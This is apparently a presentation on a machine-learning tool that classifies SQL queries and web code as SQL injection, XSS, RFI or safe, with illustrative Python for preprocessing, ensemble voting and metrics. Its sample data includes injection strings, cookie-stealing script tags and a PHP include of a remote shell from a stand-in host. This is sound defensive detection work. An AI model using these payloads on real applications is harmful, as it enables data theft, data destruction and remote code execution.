Software Vulnerability Detection Tool Using Machine Learning
This presentation describes a software vulnerability detection tool that uses machine learning algorithms to detect three critical classes of web vulnerability: SQL injection, cross-site scripting (XSS), and remote file inclusion (RFI).
The Rise of Machine Learning in Security
Accuracy and Efficiency
Machine learning algorithms have reached high prediction accuracy (over 95%) in fields ranging from medical disease prediction to traffic analysis.
Data-Driven Approach
Machine learning models are trained on large datasets of past vulnerabilities, which lets them recognize new threats that resemble known attack patterns.
Classifying Vulnerabilities
1 No Vulnerability
Normal SQL statements or web code that poses no security risk.
2 SQL Injection
Attackers inject malicious commands into SQL queries, potentially compromising sensitive data.
3 XSS or RFI
Attackers exploit vulnerabilities in web code to inject malicious scripts or files, gaining unauthorized access or control.
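To make the SQL injection class concrete, here is a minimal sketch using Python's built-in `sqlite3` module. This is an assumption for illustration only: the project itself uses MySQL, and the table and function names below are hypothetical. The first function builds the query by string concatenation, so the classic payload `x' OR '1'='1` rewrites the WHERE clause; the second passes the same value as a bound parameter.

```python
import sqlite3

def find_user_unsafe(conn, name):
    # Vulnerable: user input is pasted into the SQL text, so quotes in
    # `name` can change the structure of the query.
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()

def find_user_safe(conn, name):
    # Safe: the driver binds `name` as a value, never as SQL syntax.
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()

# Hypothetical in-memory table used only for this demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",)])

payload = "x' OR '1'='1"
print(find_user_unsafe(conn, payload))  # every row: the injected OR clause is always true
print(find_user_safe(conn, payload))    # []: no user is literally named x' OR '1'='1
```

Queries like the concatenated one above are what the "SQL Injection" label is meant to capture, while the parameterized form stays in the "No Vulnerability" class.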
Training the Model
Dataset: SQL Queries
This dataset contains a diverse range of SQL queries, each labeled '1' if it contains an injection or '0' if it is normal.
Dataset: XSS & RFI Code
This dataset contains web code snippets, each labeled 'No Vulnerability', 'XSS', or 'RFI', so that all three cases are covered in training.
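The two datasets use different label schemes, so one way to train a single classifier on both is to map them onto one shared set of label names first. The sketch below assumes CSV files with hypothetical column names (`query`/`label` for the SQL file, `code`/`label` for the web-code file) and inlines tiny sample contents so it runs on its own; the project's real files may be laid out differently. The hypothetical `summarize` helper returns the record and per-class counts that a dataset overview would display.

```python
import csv
import io
from collections import Counter

# Tiny stand-ins for the real files; column names are assumptions.
SQL_CSV = """query,label
SELECT name FROM products WHERE id = 7,0
SELECT * FROM users WHERE name = '' OR '1'='1',1
"""

WEB_CSV = """code,label
<p>Hello</p>,No Vulnerability
<script>alert(1)</script>,XSS
<?php include($_GET['page']); ?>,RFI
"""

# The SQL dataset uses '1' for injection and '0' for normal queries.
SQL_LABELS = {"0": "No Vulnerability", "1": "SQL Injection"}

def load_samples(sql_file, web_file):
    """Return (text, label) pairs from both datasets using one shared label set."""
    samples = []
    for row in csv.DictReader(sql_file):
        samples.append((row["query"], SQL_LABELS[row["label"].strip()]))
    for row in csv.DictReader(web_file):
        samples.append((row["code"], row["label"].strip()))
    return samples

def summarize(samples):
    """Record count and per-class counts, as a dataset overview might show."""
    return len(samples), Counter(label for _, label in samples)

samples = load_samples(io.StringIO(SQL_CSV), io.StringIO(WEB_CSV))
total, per_class = summarize(samples)
print(total)  # 5
print(per_class)
```

With real files, `io.StringIO(...)` would be replaced by `open(path, newline="")`, which is how the `csv` module expects files to be opened.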
Testing and Evaluation
Test Dataset
A separate dataset of SQL queries, XSS code, and RFI code, not seen during training and given to the model without labels, used to evaluate the model's accuracy and effectiveness.
Prediction
The trained model is applied to the test dataset to predict the type of vulnerability present in each query.
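When no separate labeled test file is available, a common way to obtain unseen evaluation data is to hold out part of the labeled data. The sketch below is a stratified split in plain Python. This is a swapped-in technique, not necessarily what the project does, and `stratified_split` and its parameters are hypothetical names. Each label keeps roughly its original share in the training and test parts, and a fixed seed makes the split repeatable.

```python
import random
from collections import defaultdict

def stratified_split(samples, test_fraction=0.25, seed=42):
    """Split (text, label) pairs into train and test lists, label by label.

    Each label contributes about `test_fraction` of its samples to the test
    set, so every class keeps roughly its original share in both parts.
    """
    by_label = defaultdict(list)
    for text, label in samples:
        by_label[label].append((text, label))
    rng = random.Random(seed)  # fixed seed makes the split repeatable
    train, test = [], []
    for label in sorted(by_label):
        group = by_label[label]
        rng.shuffle(group)
        n_test = round(len(group) * test_fraction)
        test.extend(group[:n_test])
        train.extend(group[n_test:])
    return train, test

# Hypothetical labeled samples, 8 per class.
data = [(f"injected query {i}", "SQL Injection") for i in range(8)]
data += [(f"normal query {i}", "No Vulnerability") for i in range(8)]
train, test = stratified_split(data)
print(len(train), len(test))  # 12 4
```

Only the test part is passed to the model for prediction; its held-back labels are then compared with the predictions to compute the evaluation metrics.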
System Architecture
1 User Interface
Provides a user-friendly interface for interacting with the vulnerability detection tool.
2 Dataset Processing
Prepares and cleans the input dataset, using natural language processing techniques to extract the features the model learns from.
3 Ensemble Algorithm
Combines the predictions of multiple machine learning algorithms to improve performance and reduce the errors of any single model.
4 Model Evaluation
Evaluates the model's accuracy and effectiveness using metrics such as precision, recall, and F-score.
5 Prediction Engine
Uses the trained model to predict the vulnerability type of new test queries.
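The Dataset Processing component is described only as using natural language processing techniques to extract features. As a minimal sketch of that idea, the code below tokenizes a query or code snippet with a regular expression and turns it into a bag-of-tokens count vector over a shared vocabulary. It uses Python's `re` module instead of NLTK so that it runs without extra downloads. The token pattern and the function names are assumptions. Punctuation is kept as separate tokens because characters such as quotes, angle brackets, and `=` often carry the attack signal.

```python
import re
from collections import Counter

# Words (including identifiers like _GET), numbers, or any single
# non-space punctuation character such as ' < > ( ) = ;
TOKEN_RE = re.compile(r"[A-Za-z_]+|\d+|[^\sA-Za-z_\d]")

def tokenize(code):
    """Split a SQL query or web-code snippet into lower-cased tokens."""
    return [tok.lower() for tok in TOKEN_RE.findall(code)]

def build_vocabulary(texts):
    """Map each distinct token to a column index, in order of first appearance."""
    vocab = {}
    for text in texts:
        for tok in tokenize(text):
            vocab.setdefault(tok, len(vocab))
    return vocab

def vectorize(text, vocab):
    """Bag-of-tokens count vector; tokens outside the vocabulary are ignored."""
    counts = Counter(tokenize(text))
    return [counts[tok] for tok in vocab]

docs = ["SELECT * FROM t WHERE a='1'", "<script>alert(1)</script>"]
vocab = build_vocabulary(docs)
print(tokenize(docs[0]))
# ['select', '*', 'from', 't', 'where', 'a', '=', "'", '1', "'"]
print(len(vocab))  # 16
```

Word-only tokenizers designed for natural language tend to discard or merge these punctuation characters, which is why the sketch keeps them as separate tokens.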
Project Setup and Deployment
1 Prerequisites
Install Python 3.7 and a MySQL database, then copy the database content from 'DB.txt' into it.
2 NLTK Installation
Download and install the required Natural Language Toolkit (NLTK) packages.
3 Project Execution
Start the Django web server by running 'run.bat', then open the application at the URL it provides.
User Interface and Functionality
Dataset Loading and Model Training
Dataset Upload
Select and upload the vulnerability dataset file ('dataset_vulner.csv').
Dataset Overview
Displays statistics about the loaded dataset, including the number of records and classes.
Run Ensemble Algorithms
Trains the machine learning ensemble model on the preprocessed dataset.
Model Evaluation
Shows the model's accuracy and other performance metrics, such as precision, recall, and F-score.
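The slides do not say which algorithms the ensemble combines. The code below is a self-contained sketch of the idea. It trains three simple stand-in classifiers on bag-of-tokens features: multinomial naive Bayes, nearest centroid, and 1-nearest neighbour, the last two using cosine similarity. It then combines them by majority (hard) vote. The classifiers, the token pattern, and the tiny training set are assumptions for illustration, not the project's implementation.

```python
import math
import re
from collections import Counter, defaultdict

TOKEN_RE = re.compile(r"[A-Za-z_]+|\d+|[^\sA-Za-z_\d]")

def features(code):
    """Bag of lower-cased tokens; punctuation is kept as separate tokens."""
    return Counter(tok.lower() for tok in TOKEN_RE.findall(code))

def cosine(a, b):
    """Cosine similarity between two token-count Counters."""
    dot = sum(v * b[k] for k, v in a.items())
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0

class NaiveBayes:
    """Multinomial naive Bayes with add-one (Laplace) smoothing."""
    def fit(self, X, y):
        self.class_counts = Counter(y)
        self.token_counts = defaultdict(Counter)
        for feats, label in zip(X, y):
            self.token_counts[label].update(feats)
        self.vocab = set().union(*self.token_counts.values())
        return self

    def predict_one(self, feats):
        total = sum(self.class_counts.values())
        def log_score(label):
            counts = self.token_counts[label]
            denom = sum(counts.values()) + len(self.vocab)
            score = math.log(self.class_counts[label] / total)
            for tok, n in feats.items():
                if tok in self.vocab:  # tokens unseen in training are ignored
                    score += n * math.log((counts[tok] + 1) / denom)
            return score
        return max(self.class_counts, key=log_score)

class NearestCentroid:
    """Predicts the class whose summed token counts are most similar (cosine)."""
    def fit(self, X, y):
        self.centroids = defaultdict(Counter)
        for feats, label in zip(X, y):
            self.centroids[label].update(feats)
        return self

    def predict_one(self, feats):
        return max(self.centroids, key=lambda label: cosine(feats, self.centroids[label]))

class NearestNeighbour:
    """1-nearest neighbour: copies the label of the most similar training sample."""
    def fit(self, X, y):
        self.examples = list(zip(X, y))
        return self

    def predict_one(self, feats):
        return max(self.examples, key=lambda ex: cosine(feats, ex[0]))[1]

class MajorityVoteEnsemble:
    """Hard voting: each model casts one vote; ties go to the earliest model's vote."""
    def __init__(self, models):
        self.models = models

    def fit(self, X, y):
        for model in self.models:
            model.fit(X, y)
        return self

    def predict_one(self, feats):
        votes = Counter(model.predict_one(feats) for model in self.models)
        return votes.most_common(1)[0][0]

# Tiny hypothetical training set, for illustration only.
train = [
    ("SELECT name FROM users WHERE id = 3", "No Vulnerability"),
    ("<p>Welcome back</p>", "No Vulnerability"),
    ("SELECT * FROM users WHERE name = '' OR '1'='1'", "SQL Injection"),
    ("SELECT * FROM items WHERE id = 1; DROP TABLE items; --", "SQL Injection"),
    ("<script>alert(document.cookie)</script>", "XSS"),
    ("<img src=x onerror=alert(1)>", "XSS"),
    ("<?php include($_GET['page']); ?>", "RFI"),
    ("<?php include('http://evil.example/shell.txt'); ?>", "RFI"),
]
model = MajorityVoteEnsemble([NaiveBayes(), NearestCentroid(), NearestNeighbour()])
model.fit([features(text) for text, _ in train], [label for _, label in train])
print(model.predict_one(features("<script>alert('x')</script>")))  # XSS
```

Hard voting lets each model make its own mistakes as long as the majority is right. With scikit-learn, the same pattern is usually expressed with `sklearn.ensemble.VotingClassifier(voting="hard")` over real estimators.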
Vulnerability Prediction and Results
Accuracy: 95%
The model achieved an accuracy of 95% in detecting vulnerabilities.
Precision: 0.98
Of the samples the model flagged as vulnerable, 98% were actual vulnerabilities.
Recall: 0.92
The model detected 92% of all existing vulnerabilities.
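These figures come from confusion-matrix counts in a standard way, and the F-score used in Model Evaluation is the harmonic mean of precision and recall. The sketch below treats every label other than 'No Vulnerability' as the positive ("vulnerable") class. That is an assumption about how the reported figures were computed. The function names are hypothetical. The last line computes the F-score implied by the reported precision and recall, assuming both describe the same detection task.

```python
def f_score(precision, recall):
    """Harmonic mean of precision and recall (F1)."""
    if precision + recall == 0:
        return 0.0
    return 2 * precision * recall / (precision + recall)

def detection_metrics(y_true, y_pred, negative="No Vulnerability"):
    """Accuracy, precision, recall and F1 for 'vulnerable vs. not vulnerable'.

    Any label other than `negative` counts as a vulnerability.
    """
    pairs = [(t != negative, p != negative) for t, p in zip(y_true, y_pred)]
    tp = sum(t and p for t, p in pairs)       # vulnerable and flagged
    fp = sum(p and not t for t, p in pairs)   # safe but flagged
    fn = sum(t and not p for t, p in pairs)   # vulnerable but missed
    tn = len(pairs) - tp - fp - fn            # safe and not flagged
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return {
        "accuracy": (tp + tn) / len(pairs),
        "precision": precision,  # share of flagged samples that are truly vulnerable
        "recall": recall,        # share of true vulnerabilities that were flagged
        "f_score": f_score(precision, recall),
    }

# F-score implied by the reported precision (0.98) and recall (0.92).
print(round(f_score(0.98, 0.92), 3))  # 0.949

# Hypothetical predictions, for illustration only.
y_true = ["SQL Injection", "No Vulnerability", "XSS", "RFI", "No Vulnerability"]
y_pred = ["SQL Injection", "XSS", "XSS", "No Vulnerability", "No Vulnerability"]
print(detection_metrics(y_true, y_pred))
```

Precision drops when safe code is flagged (false positives), while recall drops when real vulnerabilities are missed (false negatives). For a security tool, the recall figure is usually the one to watch.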